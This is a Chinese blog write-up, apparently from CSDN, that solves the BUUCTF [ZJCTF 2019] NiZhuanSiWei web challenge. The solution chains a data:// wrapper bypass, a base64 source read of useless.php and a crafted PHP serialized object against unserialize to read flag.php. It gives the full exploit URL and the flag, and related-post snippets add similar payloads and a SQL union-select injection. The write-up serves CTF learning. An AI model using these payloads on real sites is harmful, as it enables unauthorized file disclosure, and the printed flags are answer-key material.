BUUCTF [ZJCTF 2019]NiZhuanSiWei 1解题思路

最新推荐文章于 2024-11-25 22:57:33 发布
原创 最新推荐文章于 2024-11-25 22:57:33 发布 · 819 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全 #web安全 #密码学 #安全威胁分析 #系统安全

[ZJCTF 2019]NiZhuanSiWei 1

打开实例,发现为代码审计,确认为文件包含漏洞

在这里插入图片描述

需要三个参数text、file、password,首先是text验证,逻辑显示text必须有值,且读取文件内容得是welcome to the zjctf

采用读取本地文件绕过,在E盘新建文件

在这里插入图片描述

发现无效

在这里插入图片描述

尝试data流

?text=data://,welcome to the zjctf

在这里插入图片描述

成功绕过,接下来是file绕过,逻辑显示不能包含flag,注意到旁边注释useless.php,尝试读取页面内容

在这里插入图片描述

在这里插入图片描述

读取失败,尝试采用base64编码读取,读取成功

在这里插入图片描述

获得一串base64

PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo

解码为一段php代码

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

在这里插入图片描述

代码显示flag在flag.php中,此前注意到源代码的unserialize方法,那最后的password参数就是反序列化了

在这里插入图片描述

构造payload,注意到有__tostring方法,所以只要直接传flag.php字符串就行

<?php
class Flag{
    public $file = 'flag.php';
}
$select = new Flag();
$res=serialize(@$select);   
echo $res;

运行获得序列化字符串

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

在这里插入图片描述

运行,纳尼,没反应??

在这里插入图片描述

怀疑是与file的内容冲突了,把file改回来,显示成功

?text=data://,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

在这里插入图片描述

发现flag没显示,查看源代码,发现flag

在这里插入图片描述

flag{8cfd1d3e-077f-48e6-aba4-07bde718c28b}
NSSCTF[ZJCTF 2019]NiZhuanSiWei详解(超级无敌详细,伪协议,文件包含,反序列化)
weixin_66112047的博客
01-29 1175
构造序列化去覆盖,获取flag
[ZJCTF 2019]NiZhuanSiWei
brainw的博客
04-22 2733
[ZJCTF 2019]NiZhuanSiWei 代码审计 查看一下useless.php --只有注释信息 没有用 利用data协议绕过 将welcome to the zjctf写入 而data://协议允许读入 payload: text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= 到这里就不会了 只有看下wp了 正则判断...
BUUCTF [ZJCTF 2019]NiZhuanSiWei
weixin_73399382的博客
04-28 645
我们只需添加两行代码即可得到序列化后数据O:4:"Flag":1:{s:4:"file";}(别忘了赋值给$file!查看代码后发现参数给变量password前需要进行反序列化,说明原本的数据是序列化后的数据。第二层:代码中用正则匹配过滤flag,发现变量中含flag就exit停止执行。但是下面代码给我们提示了useless.php文件,文件包含执行。显示成功,在源码(ctrl+U和鼠标右键都可查看)中发现flag。上面提示我们flag.php文件,估计flag就在这里面。
web buuctf [ZJCTF 2019]NiZhuanSiWei1
weixin_44214568的博客
03-14 1368
一共有三个参数,需要考虑传参,php传参,而且是text和file这样的值,基本可以考虑需要用php伪协议 , php伪协议是基于文件包含的,文件包含有本地包含和远程包含, 当包含的文件在远程服务器上时,就形成了远程文件包含。 远程文件包含需要在 php.ini 中设置: allow_url_include = on(是否允许 include/require 远程文件) allow_url_fopen = on(是否允许打开远程文件) php伪协议是php支持的协议和封装协议 贴(我从...
[ZJCTF 2019]NiZhuanSiWei 1
feng的博客
10-23 1401
知识点 文件包含与各种协议 反序列化 WP 首先进入环境,得到源码: $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r').
buuctf-[ZJCTF 2019]NiZhuanSiWei
Nothing-one的博客
11-04 425
打开之后我们就可以进行php的代码审计。我们从头开始看起。 在第一个if中我们就可以看到要满足里面的等式才可以看到file_get_contents()函数的功能是读取文件内容到一个字符串,但这里没没有一个文件,而是读取的text变量。没查到相关这方面的用法,特别是那个r参数。 这里我们如果直接将text与这段话进行等值那么我们就可以看到这个网站没有回显,也就是说我们要想办法绕过这个。 用php的伪协议也就是data://伪协议来进行漏洞利用。 这里也就说明了我绕过了。 然后我们再看下一个if语句。 因为.
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2593
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
Buuctf Web题解
weixin_68029979的博客
04-24 2091
写在前面, 本人小白一枚,记录一下web做题过程,大部分为个人理解可能有些地方写的不够明确还请见谅。当然由于刚入手web题,所以有些题会没有思路,这时会参考其他大佬的题解过程。本文会一直更新,由于是第一次写博客,所以并不知道一篇能写多少,不管怎样会一直更新的。在题解中,可能并没有说清除为什么是这样,什么要这样,其实大部分我也不知道是为什么,但就是这样做,由上所说我是个小白。如果在文中,出现了只有题目没有题解的情况,是因为我还没有学习与之相关的知识,所以先跳过了,但总会写的。
buuctf文件包含
最新发布
02-25
### 关于buuCTF中的文件包含漏洞解题思路 #### 文件包含漏洞概述 文件包含漏洞发生在Web应用程序通过PHP等服务器端脚本语言引入外部文件时,如果程序未对输入参数做严格验证,则攻击者可以通过控制这些参数来读取...
PHP反序列化漏洞+CTF实例
hyq99999的博客
08-09 1385
整理php序列化相关知识点以及在CTF中的实例。
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解)
小宇的web博客
01-21 4120
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解) 这里打开之后是一段源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".
BUUCTF [ZJCTF 2019]NiZhuanSiWei1
biggerpig的博客
09-25 1070
BUUCTF web类型题目[ZJCTF 2019]NiZhuanSiWei1详解
buuctf——[ZJCTF 2019]NiZhuanSiWei
m_de_g的博客
04-16 635
该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持,还会使用内存映射技术来增强性能。把整个文件读入一个字符串中。进行抓包传输,开始还一直以为是。方法二需要注意的是,需要使用。的问题,踩了一堆的坑。
BUUCTF [web专项24][ZJCTF 2019]NiZhuanSiWei
yanglinchiji的博客
11-06 267
注意:一定不要再用伪协议获得useless.php的base64编码内容了,而且还要指明文件是useless.php,否则会被顶掉内容。将其修改变量file后并添加输出后,进行序列化操作,再传输给password让其输出。还记得前面的截图吗,在后面会有一个反序列化操作,那么我们就可以利用该代码。获取结果后,将其传给password。3.这道题是有序列化和反序列化的。出现base64码,解码后,得到。1.需要给text传输一句话。进行正则匹配,禁止出现flag。接下来,尝试伪协议查看。参考他人wp后,发现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

成为别人口中的IT高手

写文章不容易,充充电吧~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值